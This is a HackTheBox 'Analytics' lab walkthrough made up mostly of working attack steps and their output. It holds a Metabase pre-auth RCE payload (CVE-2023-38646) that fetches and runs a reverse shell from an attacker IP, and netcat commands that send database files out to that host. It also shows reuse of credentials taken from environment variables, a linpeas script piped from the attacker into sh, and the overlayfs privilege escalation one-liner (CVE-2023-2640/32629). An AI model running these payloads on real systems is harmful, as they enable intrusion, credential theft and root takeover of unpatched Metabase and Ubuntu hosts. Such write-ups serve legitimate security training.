Analytics
Recon
![[Labs/HackTheBox/Seasonal/Season 3/Analytics/nmap_scan.log styled]]
HTTP (80)
![[Labs/HackTheBox/Machines/Analytics/images/Writeup.png]]
Enumerate subdomains:
└─$ domain='analytical.htb'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fw 4
v2.1.0-dev
data [Status: 200, Size: 77858, Words: 3574, Lines: 28, Duration: 153ms]
:: Progress: [4989/4989] :: Job [1/1] :: 564 req/sec :: Duration: [0:00:09] :: Errors: 0 ::Metabase is running on this subdomain
![[Labs/HackTheBox/Machines/Analytics/images/Writeup-1.png]]
Application version is disclosed in the source: v0.46.6
![[Labs/HackTheBox/Machines/Analytics/images/Writeup-2.png]]
Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)CVE-2023-38646 PoC
The PoC didn't work for me for some reason, error about Vector arg to map conj must be a pair so it must be related to base64 blob and bash.
I just used curl to get the shell:
{
"token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
"details": {
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules": {},
"details":{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {curl,10.10.14.42/rev}|{bash,-i}')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "test",
"engine": "h2"
}
}Application contains database.db (directory...), but no sqlite3.
3d6ddc86c8c7:/$ sqlite3 metabase.db .dump
bash: sqlite3: command not foundDownload via netcat:
3d6ddc86c8c7:/metabase.db$ busybox nc 10.10.14.42 4444 < metabase.db.mv.db
3d6ddc86c8c7:/metabase.db$ busybox nc 10.10.14.42 4444 < metabase.db.trace.dbmetabase.db.mv.db file is a H2 Server database file, DBeaver can be used to open it. I don't think the password is crackable so Im going to avoid it for now.
![[Labs/HackTheBox/Machines/Analytics/images/Writeup-3.png]]
Environment variables hold interesting data!
3d6ddc86c8c7:/metabase.db$ env
...
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=3d6ddc86c8c7
MB_DB_FILE=//metabase.db/metabase.db
PWD=/metabase.db
LOGNAME=metabase
META_USER=metalytics
META_PASS=An4lytics_ds20223#
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
...SSH
Creds:
metalytics:An4lytics_ds20223#
└─$ sshpass -p 'An4lytics_ds20223#' ssh metalytics@analytical.htb
metalytics@analytics:~$ id
uid=1000(metalytics) gid=1000(metalytics) groups=1000(metalytics)User.txt
metalytics@analytics:~$ cat user.txt
43e261df0ac451cadc5cf55a4f543639Privilege Escalation
Linpeas shows nothing interesting.
metalytics@analytics:~$ curl 10.10.14.42/lp.sh|sh|tee /tmp/lp.sh
...As of doing retired box HTB suggests checking kernel version. Box was released on 07 Oct 2023 so there's probably some kernel exploit.
metalytics@analytics:~$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
metalytics@analytics:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 22.04.3 LTS
Release: 22.04
Codename: jammyUbuntu Local Privilege Escalation (CVE-2023-2640 & CVE-2023-32629)CVE-2023-2640-CVE-2023-32629
metalytics@analytics:~$ cd `mktemp -d`
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'"
uid=0(root) gid=0(root) groups=0(root)
metalytics@analytics:/tmp/tmp.J24NI1yLfM$ u/python3 -c $'import os;os.setuid(0);os.system("/bin/bash")'
root@analytics:/tmp/tmp.J24NI1yLfM# id
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)Root.txt
root@analytics:/root# cat root.txt
f4730b8375b50900c99246cf7471f399Last updated